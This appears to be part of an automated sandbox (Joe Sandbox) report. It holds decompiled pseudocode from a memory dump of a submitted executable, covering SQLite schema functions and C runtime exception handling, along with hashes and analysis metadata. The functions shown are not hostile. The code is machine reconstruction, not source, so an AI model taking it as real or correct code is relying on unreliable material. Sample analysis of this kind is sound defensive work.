												__eflags = _t116 - _t160;
												if(_t116 == _t160) {
													 *((char*)(_t231 + 0x1e)) = 1;
												}
												_t160 =  *(_t160 + 4);
												__eflags = _t160;
											} while (_t160 != 0);
											_t159 = _v32;
											_t232 = _v28;
											goto L30;
										}
										 *((char*)(_t231 + 0x1e)) = 1;
										return _t134;
									}
								}
								_push(_v16);
								_push( *((intOrPtr*)(_t232 + 0x9c)));
								_push(1);
								_t225 = 8;
								L0083CD8E(_v12, _t225);
								E0083D062(_v12, 1);
								_push(0);
								_v40 = 0;
								 *((intOrPtr*)(_t232 + 0x44)) = 2;
								_v48 = 8;
								_v44 = 1;
								E0084E78E(_t232, _a8,  &_v48, 0, 0, 0);
								_push(0);
								_push(0);
								_push(1);
								_t228 = 0x1f;
								L0083CD8E(_v12, _t228);
								_t237 = _t236 + 0x2c;
								if( *((intOrPtr*)(_t232 + 0x40)) != 0) {
									L14:
									asm("sbb ecx, ecx");
									_t122 = E00849581(_t231, _t159,  ~( *((intOrPtr*)(_t159 + 0x4c)) -  *((intOrPtr*)( *((intOrPtr*)(_t231 + 8)) + 0x2c))) + 1);
									goto L16;
								}
								_t116 = E0084DA52(_t232, 0, _a8);
								if(_t116 == 0) {
									goto L34;
								}
								 *(_t159 + 4) =  *(_t116 + 4);
								 *(_t159 + 8) =  *(_t116 + 8);
								 *(_t116 + 4) =  *(_t116 + 4) & 0x00000000;
								 *(_t116 + 8) =  *(_t116 + 8) & 0x00000000;
								E008488F3();
								goto L14;
							}
							 *((intOrPtr*)(_t159 + 0x14)) =  *((intOrPtr*)(_t231 + 0x4c));
							_t116 =  *((intOrPtr*)(_t231 + 0x50));
							if(_t116 != 0) {
								goto L21;
							}
							goto L9;
						}
						E00870BE0(_t231,  &_v84, 0, 0x24);
						E00870BE0(_t231,  &_v140, 0, 0x38);
						_t212 =  *((intOrPtr*)(_t159 + 0x2c));
						_v108 = _v108 | 0xffffffff;
						_t235 = _t235 + 0x18;
						_v128 =  *_t159;
						_v140 = 1;
						_v62 = 1;
						_v120 = _t159;
						_v84 = _t232;
						_v80 =  &_v140;
						_t116 = E00845192( &_v84,  *((intOrPtr*)(_t159 + 0x2c)));
						if(_t116 != 0) {
							goto L34;
						}
						goto L7;
					}
				} else {
					L34:
					return _t116;
				}
			}













































                                    0x0084973c
                                    0x0084973e
                                    0x00849742
                                    0x00849745
                                    0x00849747
                                    0x00849757
                                    0x00000000
                                    0x00849767
                                    0x00849767
                                    0x0084976d
                                    0x00849772
                                    0x00000000
                                    0x00000000
                                    0x00849778
                                    0x00849786
                                    0x00849789
                                    0x008497e6
                                    0x008497eb
                                    0x008497fe
                                    0x00849800
                                    0x00849805
                                    0x0084980a
                                    0x00000000
                                    0x00000000
                                    0x00849812
                                    0x00849813
                                    0x00849814
                                    0x00849817
                                    0x0084981a
                                    0x00849822
                                    0x00849827
                                    0x00849838
                                    0x00849840
                                    0x00849848
                                    0x0084984b
                                    0x0084990a
                                    0x00849910
                                    0x00849915
                                    0x00849915
                                    0x00849916
                                    0x0084991e
                                    0x00849923
                                    0x00849926
                                    0x00849926
                                    0x00849934
                                    0x00849935
                                    0x0084993b
                                    0x00849943
                                    0x00849945
                                    0x00849948
                                    0x0084994a
                                    0x0084994d
                                    0x00849954
                                    0x00849958
                                    0x00849965
                                    0x0084996d
                                    0x00849975
                                    0x0084997a
                                    0x00849983
                                    0x00849988
                                    0x00849992
                                    0x0084999c
                                    0x008499a1
                                    0x008499a1
                                    0x00849992
                                    0x008499ac
                                    0x008499b9
                                    0x008499bb
                                    0x008499bd
                                    0x008499c2
                                    0x008499d3
                                    0x008499de
                                    0x00000000
                                    0x008499e4
                                    0x008499e4
                                    0x008499e7
                                    0x008499eb
                                    0x00000000
                                    0x00000000
                                    0x008499f7
                                    0x00849a0a
                                    0x00849a13
                                    0x00849a1e
                                    0x00849a21
                                    0x00849a24
                                    0x00849a26
                                    0x00849a74
                                    0x00849a74
                                    0x00849a7b
                                    0x00849a7e
                                    0x00849a82
                                    0x00849a86
                                    0x00000000
                                    0x00000000
                                    0x00849a8b
                                    0x00849a91
                                    0x00849a93
                                    0x00849a95
                                    0x00849a9a
                                    0x00849a9a
                                    0x00849aa3
                                    0x00849aa3
                                    0x00849aa6
                                    0x00000000
                                    0x00849aa6
                                    0x00849a2b
                                    0x00849a2e
                                    0x00849a2e
                                    0x00849a31
                                    0x00849a34
                                    0x00849a43
                                    0x00849a55
                                    0x00849a58
                                    0x00849a5f
                                    0x00849a61
                                    0x00849a63
                                    0x00849a63
                                    0x00849a67
                                    0x00849a6a
                                    0x00849a6a
                                    0x00849a6e
                                    0x00849a71
                                    0x00000000
                                    0x00849a71
                                    0x00849a15
                                    0x00000000
                                    0x00849a15
                                    0x008499de
                                    0x00849851
                                    0x00849857
                                    0x0084985d
                                    0x00849861
                                    0x00849862
                                    0x0084986f
                                    0x00849879
                                    0x0084987d
                                    0x00849885
                                    0x0084988d
                                    0x00849893
                                    0x0084989a
                                    0x008498a5
                                    0x008498a7
                                    0x008498a9
                                    0x008498ad
                                    0x008498ae
                                    0x008498b3
                                    0x008498ba
                                    0x008498ec
                                    0x008498f9
                                    0x008498ff
                                    0x00000000
                                    0x00849904
                                    0x008498c3
                                    0x008498cb
                                    0x00000000
                                    0x00000000
                                    0x008498d4
                                    0x008498da
                                    0x008498df
                                    0x008498e3
                                    0x008498e7
                                    0x00000000
                                    0x008498e7
                                    0x008497f0
                                    0x008497f3
                                    0x008497f8
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x008497f8
                                    0x00849793
                                    0x008497a6
                                    0x008497af
                                    0x008497b3
                                    0x008497b7
                                    0x008497ba
                                    0x008497c3
                                    0x008497ca
                                    0x008497d0
                                    0x008497d3
                                    0x008497d6
                                    0x008497d9
                                    0x008497e0
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x008497e0
                                    0x00849aad
                                    0x00849aad
                                    0x00849aad
                                    0x00849aad

                                    APIs
                                    • _strlen.LIBCMT ref: 008499FA
                                      • Part of subcall function 0084DA52: _strlen.LIBCMT ref: 0084DB9D
                                      • Part of subcall function 008488F3: _strlen.LIBCMT ref: 00848929
                                    • _strlen.LIBCMT ref: 00849A37
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _strlen
                                    • String ID: CREATE %s %.*s$CREATE TABLE %Q.sqlite_sequence(name,seq)$TABLE$UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d$VIEW$sqlite_master$sqlite_temp_master$tbl_name='%q'$view
                                    • API String ID: 4218353326-3984390951
                                    • Opcode ID: c138678e7a2852043da83650dffd628cef4c09882ed2e05cec0062f6622591ae
                                    • Instruction ID: 4915e497cbe3f851ff1173bbb79baef89fab65e17ba2d7bfad6045a5943ea14e
                                    • Opcode Fuzzy Hash: c138678e7a2852043da83650dffd628cef4c09882ed2e05cec0062f6622591ae
                                    • Instruction Fuzzy Hash: 8DB18170A00308EFDF24DFA8C885BAEB7B5FF84314F108169E545EB286DB75A945CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0088931A Relevance: 18.4, APIs: 12, Instructions: 374COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 76%
                                    			E0088931A(void* __edx, char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v24;
				char _v28;
				signed int _t105;
				signed int _t115;
				signed int _t117;
				signed int _t121;
				signed int _t125;
				signed int _t129;
				signed int _t133;
				signed int _t137;
				signed int _t141;
				signed int _t145;
				signed int _t149;
				signed int _t153;
				signed int _t157;
				signed int _t161;
				signed int _t165;
				signed int _t169;
				signed int _t173;
				signed int _t177;
				signed int _t181;
				signed int _t185;
				signed int _t189;
				char _t195;
				intOrPtr* _t196;
				char _t209;
				signed int _t212;
				char _t221;
				char _t222;
				void* _t225;
				char* _t227;
				signed int _t228;
				signed int _t232;
				signed int _t233;
				intOrPtr _t234;
				void* _t235;
				void* _t237;
				char* _t258;

				_t225 = __edx;
				_t209 = _a4;
				_v16 = 0;
				_v28 = _t209;
				_v24 = 0;
				if( *((intOrPtr*)(_t209 + 0xac)) != 0 ||  *((intOrPtr*)(_t209 + 0xb0)) != 0) {
					_t235 = E008800C6(0, 1, 0x50);
					_v8 = _t235;
					E00880123(0);
					if(_t235 != 0) {
						_t228 = E008800C6(0, 1, 4);
						_v12 = _t228;
						E00880123(0);
						if(_t228 != 0) {
							if( *((intOrPtr*)(_t209 + 0xac)) == 0) {
								_t212 = 0x14;
								memcpy(_v8, 0x8b2060, _t212 << 2);
								L24:
								_t237 = _v8;
								_t232 = _v16;
								 *_t237 =  *( *(_t209 + 0x88));
								 *((intOrPtr*)(_t237 + 4)) =  *((intOrPtr*)( *(_t209 + 0x88) + 4));
								 *((intOrPtr*)(_t237 + 8)) =  *((intOrPtr*)( *(_t209 + 0x88) + 8));
								 *((intOrPtr*)(_t237 + 0x30)) =  *((intOrPtr*)( *(_t209 + 0x88) + 0x30));
								 *((intOrPtr*)(_t237 + 0x34)) =  *((intOrPtr*)( *(_t209 + 0x88) + 0x34));
								 *_v12 = 1;
								if(_t232 != 0) {
									 *_t232 = 1;
								}
								goto L26;
							}
							_t233 = E008800C6(0, 1, 4);
							_v16 = _t233;
							E00880123(0);
							if(_t233 != 0) {
								_t234 =  *((intOrPtr*)(_t209 + 0xac));
								_t14 = _t235 + 0xc; // 0xc
								_t115 = L00884D02(_t225);
								_t117 = L00884D02(_t225,  &_v28, 1, _t234, 0x14, _v8 + 0x10,  &_v28);
								_t121 = L00884D02(_t225,  &_v28, 1, _t234, 0x16, _v8 + 0x14, 1);
								_t125 = L00884D02(_t225,  &_v28, 1, _t234, 0x17, _v8 + 0x18, _t234);
								_v20 = _v8 + 0x1c;
								_t129 = L00884D02(_t225,  &_v28, 1, _t234, 0x18, _v8 + 0x1c, 0x15);
								_t133 = L00884D02(_t225,  &_v28, 1, _t234, 0x50, _v8 + 0x20, _t14);
								_t137 = L00884D02(_t225);
								_t141 = L00884D02(_t225,  &_v28, 0, _t234, 0x1a, _v8 + 0x28,  &_v28);
								_t145 = L00884D02(_t225,  &_v28, 0, _t234, 0x19, _v8 + 0x29, 1);
								_t149 = L00884D02(_t225,  &_v28, 0, _t234, 0x54, _v8 + 0x2a, _t234);
								_t153 = L00884D02(_t225,  &_v28, 0, _t234, 0x55, _v8 + 0x2b, 0x51);
								_t157 = L00884D02(_t225,  &_v28, 0, _t234, 0x56, _v8 + 0x2c, _v8 + 0x24);
								_t161 = L00884D02(_t225);
								_t165 = L00884D02(_t225,  &_v28, 0, _t234, 0x52, _v8 + 0x2e,  &_v28);
								_t169 = L00884D02(_t225,  &_v28, 0, _t234, 0x53, _v8 + 0x2f, 0);
								_t173 = L00884D02(_t225,  &_v28, 2, _t234, 0x15, _v8 + 0x38, _t234);
								_t177 = L00884D02(_t225,  &_v28, 2, _t234, 0x14, _v8 + 0x3c, 0x57);
								_t181 = L00884D02(_t225,  &_v28, 2, _t234, 0x16, _v8 + 0x40, _v8 + 0x2d);
								_push(_v8 + 0x44);
								_push(0x17);
								_push(_t234);
								_t185 = L00884D02(_t225);
								_t189 = L00884D02(_t225,  &_v28, 2, _t234, 0x50, _v8 + 0x48,  &_v28);
								if((L00884D02(_t225,  &_v28, 2, _t234, 0x51, _v8 + 0x4c, 2) | _t115 | _t117 | _t121 | _t125 | _t129 | _t133 | _t137 | _t141 | _t145 | _t149 | _t153 | _t157 | _t161 | _t165 | _t169 | _t173 | _t177 | _t181 | _t185 | _t189) == 0) {
									_t227 =  *_v20;
									while(1) {
										_t195 =  *_t227;
										if(_t195 == 0) {
											break;
										}
										_t61 = _t195 - 0x30; // -48
										_t221 = _t61;
										if(_t221 > 9) {
											if(_t195 != 0x3b) {
												L16:
												_t227 = _t227 + 1;
												continue;
											}
											_t258 = _t227;
											do {
												_t196 = _t258 + 1;
												_t222 =  *_t196;
												 *_t258 = _t222;
												_t258 = _t196;
											} while (_t222 != 0);
											continue;
										}
										 *_t227 = _t221;
										goto L16;
									}
									goto L24;
								}
								E0088921C(_v8);
								E00880123(_v8);
								E00880123(_v12);
								E00880123(_v16);
								goto L4;
							}
							E00880123(_t235);
							E00880123(_v12);
							L7:
							goto L4;
						}
						E00880123(_t235);
						goto L7;
					}
					L4:
					return 1;
				} else {
					_t232 = 0;
					_v12 = 0;
					_t237 = 0x8b2060;
					L26:
					_t105 =  *(_t209 + 0x84);
					if(_t105 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t209 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t105 | 0xffffffff) == 0) {
							E00880123( *(_t209 + 0x88));
							E00880123( *((intOrPtr*)(_t209 + 0x7c)));
						}
					}
					 *((intOrPtr*)(_t209 + 0x7c)) = _v12;
					 *(_t209 + 0x84) = _t232;
					 *(_t209 + 0x88) = _t237;
					return 0;
				}
			}













































                                    0x0088931a
                                    0x00889323
                                    0x0088932a
                                    0x0088932d
                                    0x00889330
                                    0x00889339
                                    0x0088935b
                                    0x0088935f
                                    0x00889362
                                    0x0088936c
                                    0x0088937f
                                    0x00889383
                                    0x00889386
                                    0x00889390
                                    0x008893a2
                                    0x00889635
                                    0x00889636
                                    0x00889638
                                    0x00889640
                                    0x00889644
                                    0x00889649
                                    0x00889654
                                    0x00889660
                                    0x0088966c
                                    0x00889678
                                    0x0088967e
                                    0x00889682
                                    0x00889684
                                    0x00889684
                                    0x00000000
                                    0x00889682
                                    0x008893b1
                                    0x008893b5
                                    0x008893b8
                                    0x008893c2
                                    0x008893d6
                                    0x008893dc
                                    0x008893e9
                                    0x00889400
                                    0x00889417
                                    0x0088942e
                                    0x0088943e
                                    0x0088944b
                                    0x00889462
                                    0x00889479
                                    0x00889490
                                    0x008894aa
                                    0x008894c1
                                    0x008894d8
                                    0x008894ef
                                    0x00889509
                                    0x00889520
                                    0x00889537
                                    0x0088954e
                                    0x00889568
                                    0x0088957f
                                    0x0088958c
                                    0x0088958d
                                    0x0088958f
                                    0x00889596
                                    0x008895ad
                                    0x008895d1
                                    0x008895ff
                                    0x0088960e
                                    0x0088960e
                                    0x00889612
                                    0x00000000
                                    0x00000000
                                    0x00889603
                                    0x00889603
                                    0x00889609
                                    0x00889618
                                    0x0088960d
                                    0x0088960d
                                    0x00000000
                                    0x0088960d
                                    0x0088961a
                                    0x0088961c
                                    0x0088961c
                                    0x0088961f
                                    0x00889621
                                    0x00889623
                                    0x00889625
                                    0x00000000
                                    0x00889629
                                    0x0088960b
                                    0x00000000
                                    0x0088960b
                                    0x00000000
                                    0x00889614
                                    0x008895d7
                                    0x008895dd
                                    0x008895e6
                                    0x008895ef
                                    0x00000000
                                    0x008895f4
                                    0x008893c5
                                    0x008893ce
                                    0x00889398
                                    0x00000000
                                    0x00889398
                                    0x00889393
                                    0x00000000
                                    0x00889393
                                    0x0088936e
                                    0x00000000
                                    0x00889343
                                    0x00889343
                                    0x00889345
                                    0x00889348
                                    0x00889686
                                    0x00889686
                                    0x0088968e
                                    0x00889690
                                    0x00889690
                                    0x00889698
                                    0x0088969d
                                    0x008896a1
                                    0x008896a9
                                    0x008896b1
                                    0x008896b7
                                    0x008896a1
                                    0x008896bb
                                    0x008896c0
                                    0x008896c6
                                    0x00000000
                                    0x008896c6

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: 86d2222d3b425210403ce876bdad4ef8cd81b2e4c5305fa828091f40cb531b9e
                                    • Instruction ID: 03492b99c76a77b4f409a010f2f0645d5e1ff3a88de43d50cbfae89c31559682
                                    • Opcode Fuzzy Hash: 86d2222d3b425210403ce876bdad4ef8cd81b2e4c5305fa828091f40cb531b9e
                                    • Instruction Fuzzy Hash: 1AC12076D41205ABDB20EBA8CC87FEE77F8FB18700F154165FA45EB282E6709D448B61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 008713F0 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 308COMMONLIBRARYCODE
                                    Download Yara Rule
                                    C-Code - Quality: 72%
                                    			E008713F0(signed int __ecx, signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, char _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				char _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr* _v48;
				signed int _v52;
				signed int* _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				void* _v72;
				char _v88;
				intOrPtr _v92;
				signed int _v96;
				intOrPtr _v104;
				void _v108;
				intOrPtr* _v116;
				signed char* _v188;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t203;
				void* _t204;
				signed int _t205;
				char _t206;
				signed int _t208;
				signed int _t210;
				signed char* _t211;
				signed int _t212;
				signed int _t213;
				signed int _t217;
				void* _t220;
				signed char* _t223;
				void* _t225;
				void* _t226;
				signed char _t230;
				signed int _t231;
				void* _t233;
				signed int _t234;
				void* _t237;
				void* _t240;
				signed char _t247;
				intOrPtr* _t252;
				void* _t255;
				signed int* _t257;
				signed int _t258;
				intOrPtr _t259;
				signed int _t260;
				void* _t265;
				void* _t270;
				void* _t271;
				signed char* _t274;
				intOrPtr* _t275;
				signed char _t276;
				signed int _t277;
				signed int _t278;
				intOrPtr* _t280;
				signed int _t281;
				signed int _t282;
				signed int _t287;
				signed int _t294;
				signed int _t295;
				intOrPtr _t298;
				signed int _t300;
				signed int _t302;
				signed char* _t303;
				signed int _t304;
				signed int _t305;
				signed int* _t307;
				signed char* _t310;
				signed int _t320;
				signed int _t321;
				signed int _t323;
				signed int _t332;
				void* _t334;
				void* _t336;
				void* _t337;
				void* _t338;
				void* _t339;

				_t302 = __edx;
				_t279 = __ecx;
				_push(_t321);
				_t307 = _a20;
				_v32 = 0;
				_v5 = 0;
				_t203 = E00872394(_a8, _a16, _t307);
				_t337 = _t336 + 0xc;
				_v16 = _t203;
				if(_t203 < 0xffffffff || _t203 >= _t307[1]) {
					L69:
					_t204 = L0087CF95(_t274, _t279, _t302, _t321);
					asm("int3");
					_t334 = _t337;
					_t338 = _t337 - 0x38;
					_push(_t274);
					_t275 = _v116;
					__eflags =  *_t275 - 0x80000003;
					if( *_t275 == 0x80000003) {
						return _t204;
					} else {
						_t205 = E008710AB(_t275, _t279, _t302, _t321, _t307, _t321);
						__eflags =  *(_t205 + 8);
						if( *(_t205 + 8) != 0) {
							__imp__EncodePointer(0);
							_t321 = _t205;
							_t225 = E008710AB(_t275, _t279, _t302, _t321);
							__eflags =  *((intOrPtr*)(_t225 + 8)) - _t321;
							if( *((intOrPtr*)(_t225 + 8)) != _t321) {
								__eflags =  *_t275 - 0xe0434f4d;
								if( *_t275 != 0xe0434f4d) {
									__eflags =  *_t275 - 0xe0434352;
									if( *_t275 != 0xe0434352) {
										_t217 = L0086ECAB(_t275, _a4, _a8, _a12, _a16, _a24, _a28);
										_t338 = _t338 + 0x1c;
										__eflags = _t217;
										if(_t217 != 0) {
											L86:
											return _t217;
										}
									}
								}
							}
						}
						_t206 = _a16;
						_v28 = _t206;
						_v24 = 0;
						__eflags =  *(_t206 + 0xc);
						if( *(_t206 + 0xc) > 0) {
							_push(_a24);
							E0086EBDD(_t275, _t279, 0, _t321,  &_v44,  &_v28, _a20, _a12, _t206);
							_t304 = _v40;
							_t339 = _t338 + 0x18;
							_t217 = _v44;
							_v20 = _t217;
							_v12 = _t304;
							__eflags = _t304 - _v32;
							if(_t304 >= _v32) {
								goto L86;
							}
							_t281 = _t304 * 0x14;
							__eflags = _t281;
							_v16 = _t281;
							do {
								_t282 = 5;
								_t220 = memcpy( &_v64,  *((intOrPtr*)( *_t217 + 0x10)) + _t281, _t282 << 2);
								_t339 = _t339 + 0xc;
								__eflags = _v64 - _t220;
								if(_v64 > _t220) {
									goto L85;
								}
								__eflags = _t220 - _v60;
								if(_t220 > _v60) {
									goto L85;
								}
								_t223 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t287 = _t223[4];
								__eflags = _t287;
								if(_t287 == 0) {
									L83:
									__eflags =  *_t223 & 0x00000040;
									if(( *_t223 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E00871370(_t304, _t275, _a4, _a8, _a12, _a16, _t223, 0,  &_v64, _a24, _a28);
										_t304 = _v12;
										_t339 = _t339 + 0x30;
									}
									goto L85;
								}
								__eflags =  *((char*)(_t287 + 8));
								if( *((char*)(_t287 + 8)) != 0) {
									goto L85;
								}
								goto L83;
								L85:
								_t304 = _t304 + 1;
								_t217 = _v20;
								_t281 = _v16 + 0x14;
								_v12 = _t304;
								_v16 = _t281;
								__eflags = _t304 - _v32;
							} while (_t304 < _v32);
							goto L86;
						}
						L0087CF95(_t275, _t279, _t302, _t321);
						asm("int3");
						_push(_t334);
						_t303 = _v188;
						_push(_t275);
						_push(_t321);
						_push(0);
						_t208 = _t303[4];
						__eflags = _t208;
						if(_t208 == 0) {
							L111:
							_t210 = 1;
							__eflags = 1;
						} else {
							_t280 = _t208 + 8;
							__eflags =  *_t280;
							if( *_t280 == 0) {
								goto L111;
							} else {
								__eflags =  *_t303 & 0x00000080;
								_t310 = _v0;
								if(( *_t303 & 0x00000080) == 0) {
									L93:
									_t276 = _t310[4];
									_t323 = 0;
									__eflags = _t208 - _t276;
									if(_t208 == _t276) {
										L103:
										__eflags =  *_t310 & 0x00000002;
										if(( *_t310 & 0x00000002) == 0) {
											L105:
											_t211 = _a4;
											__eflags =  *_t211 & 0x00000001;
											if(( *_t211 & 0x00000001) == 0) {
												L107:
												__eflags =  *_t211 & 0x00000002;
												if(( *_t211 & 0x00000002) == 0) {
													L109:
													_t323 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t303 & 0x00000002;
													if(( *_t303 & 0x00000002) != 0) {
														goto L109;
													}
												}
											} else {
												__eflags =  *_t303 & 0x00000001;
												if(( *_t303 & 0x00000001) != 0) {
													goto L107;
												}
											}
										} else {
											__eflags =  *_t303 & 0x00000008;
											if(( *_t303 & 0x00000008) != 0) {
												goto L105;
											}
										}
										_t210 = _t323;
									} else {
										_t187 = _t276 + 8; // 0x6e
										_t212 = _t187;
										while(1) {
											_t277 =  *_t280;
											__eflags = _t277 -  *_t212;
											if(_t277 !=  *_t212) {
												break;
											}
											__eflags = _t277;
											if(_t277 == 0) {
												L99:
												_t213 = _t323;
											} else {
												_t278 =  *((intOrPtr*)(_t280 + 1));
												__eflags = _t278 -  *((intOrPtr*)(_t212 + 1));
												if(_t278 !=  *((intOrPtr*)(_t212 + 1))) {
													break;
												} else {
													_t280 = _t280 + 2;
													_t212 = _t212 + 2;
													__eflags = _t278;
													if(_t278 != 0) {
														continue;
													} else {
														goto L99;
													}
												}
											}
											L101:
											__eflags = _t213;
											if(_t213 == 0) {
												goto L103;
											} else {
												_t210 = 0;
											}
											goto L112;
										}
										asm("sbb eax, eax");
										_t213 = _t212 | 0x00000001;
										__eflags = _t213;
										goto L101;
									}
								} else {
									__eflags =  *_t310 & 0x00000010;
									if(( *_t310 & 0x00000010) != 0) {
										goto L111;
									} else {
										goto L93;
									}
								}
							}
						}
						L112:
						return _t210;
					}
				} else {
					_t274 = _a4;
					if( *_t274 != 0xe06d7363 || _t274[0x10] != 3 || _t274[0x14] != 0x19930520 && _t274[0x14] != 0x19930521 && _t274[0x14] != 0x19930522) {
						_t321 = 0;
						__eflags = 0;
						goto L24;
					} else {
						_t321 = 0;
						if(_t274[0x1c] != 0) {
							L24:
							_t279 = _a12;
							_v12 = _t279;
							goto L26;
						} else {
							_t226 = E008710AB(_t274, _t279, _t302, 0);
							if( *((intOrPtr*)(_t226 + 0x10)) == 0) {
								L63:
								return _t226;
							} else {
								_t274 =  *(E008710AB(_t274, _t279, _t302, 0) + 0x10);
								_t265 = E008710AB(_t274, _t279, _t302, 0);
								_v32 = 1;
								_v12 =  *((intOrPtr*)(_t265 + 0x14));
								if(_t274 == 0 ||  *_t274 == 0xe06d7363 && _t274[0x10] == 3 && (_t274[0x14] == 0x19930520 || _t274[0x14] == 0x19930521 || _t274[0x14] == 0x19930522) && _t274[0x1c] == _t321) {
									goto L69;
								} else {
									if( *((intOrPtr*)(E008710AB(_t274, _t279, _t302, _t321) + 0x1c)) == _t321) {
										L25:
										_t279 = _v12;
										_t203 = _v16;
										L26:
										_v56 = _t307;
										_v52 = _t321;
										__eflags =  *_t274 - 0xe06d7363;
										if( *_t274 != 0xe06d7363) {
											L59:
											__eflags = _t307[3] - _t321;
											if(_t307[3] <= _t321) {
												goto L62;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L69;
												} else {
													_push(_a32);
													_push(_a28);
													_push(_t203);
													_push(_t307);
													_push(_a16);
													_push(_t279);
													_push(_a8);
													_push(_t274);
													L70();
													_t337 = _t337 + 0x20;
													goto L62;
												}
											}
										} else {
											__eflags = _t274[0x10] - 3;
											if(_t274[0x10] != 3) {
												goto L59;
											} else {
												__eflags = _t274[0x14] - 0x19930520;
												if(_t274[0x14] == 0x19930520) {
													L31:
													__eflags = _t307[3] - _t321;
													if(_t307[3] > _t321) {
														_push(_a28);
														E0086EBDD(_t274, _t279, _t307, _t321,  &_v72,  &_v56, _t203, _a16, _t307);
														_t302 = _v68;
														_t337 = _t337 + 0x18;
														_t252 = _v72;
														_v48 = _t252;
														_v20 = _t302;
														__eflags = _t302 - _v60;
														if(_t302 < _v60) {
															_t294 = _t302 * 0x14;
															__eflags = _t294;
															_v36 = _t294;
															do {
																_t295 = 5;
																_t255 = memcpy( &_v108,  *((intOrPtr*)( *_t252 + 0x10)) + _t294, _t295 << 2);
																_t337 = _t337 + 0xc;
																__eflags = _v108 - _t255;
																if(_v108 <= _t255) {
																	__eflags = _t255 - _v104;
																	if(_t255 <= _v104) {
																		_t298 = 0;
																		_v24 = 0;
																		__eflags = _v96;
																		if(_v96 != 0) {
																			_t257 =  *(_t274[0x1c] + 0xc);
																			_t305 =  *_t257;
																			_t258 =  &(_t257[1]);
																			__eflags = _t258;
																			_v40 = _t258;
																			_t259 = _v92;
																			_v44 = _t305;
																			_v28 = _t259;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t320 = _v40;
																				_t332 = _t305;
																				__eflags = _t332;
																				if(_t332 <= 0) {
																					goto L42;
																				} else {
																					while(1) {
																						_push(_t274[0x1c]);
																						_t260 =  &_v88;
																						_push( *_t320);
																						_push(_t260);
																						L89();
																						_t337 = _t337 + 0xc;
																						__eflags = _t260;
																						if(_t260 != 0) {
																							break;
																						}
																						_t332 = _t332 - 1;
																						_t320 = _t320 + 4;
																						__eflags = _t332;
																						if(_t332 > 0) {
																							continue;
																						} else {
																							_t298 = _v24;
																							_t259 = _v28;
																							_t305 = _v44;
																							goto L42;
																						}
																						goto L45;
																					}
																					_push(_a24);
																					_v5 = 1;
																					_push(_v32);
																					E00871370(_t305, _t274, _a8, _v12, _a16, _a20,  &_v88,  *_t320,  &_v108, _a28, _a32);
																					_t337 = _t337 + 0x30;
																				}
																				L45:
																				_t302 = _v20;
																				goto L46;
																				L42:
																				_t298 = _t298 + 1;
																				_t259 = _t259 + 0x10;
																				_v24 = _t298;
																				_v28 = _t259;
																				__eflags = _t298 - _v96;
																			} while (_t298 != _v96);
																			goto L45;
																		}
																	}
																}
																L46:
																_t302 = _t302 + 1;
																_t252 = _v48;
																_t294 = _v36 + 0x14;
																_v20 = _t302;
																_v36 = _t294;
																__eflags = _t302 - _v60;
															} while (_t302 < _v60);
															_t307 = _a20;
															_t321 = 0;
															__eflags = 0;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														L00870D3A(_t279, _t302, __eflags);
														_t279 = _t274;
													}
													__eflags = _v5;
													if(_v5 != 0) {
														L62:
														_t226 = E008710AB(_t274, _t279, _t302, _t321);
														__eflags =  *((intOrPtr*)(_t226 + 0x1c)) - _t321;
														if( *((intOrPtr*)(_t226 + 0x1c)) != _t321) {
															goto L69;
														} else {
															goto L63;
														}
													} else {
														__eflags = ( *_t307 & 0x1fffffff) - 0x19930521;
														if(( *_t307 & 0x1fffffff) < 0x19930521) {
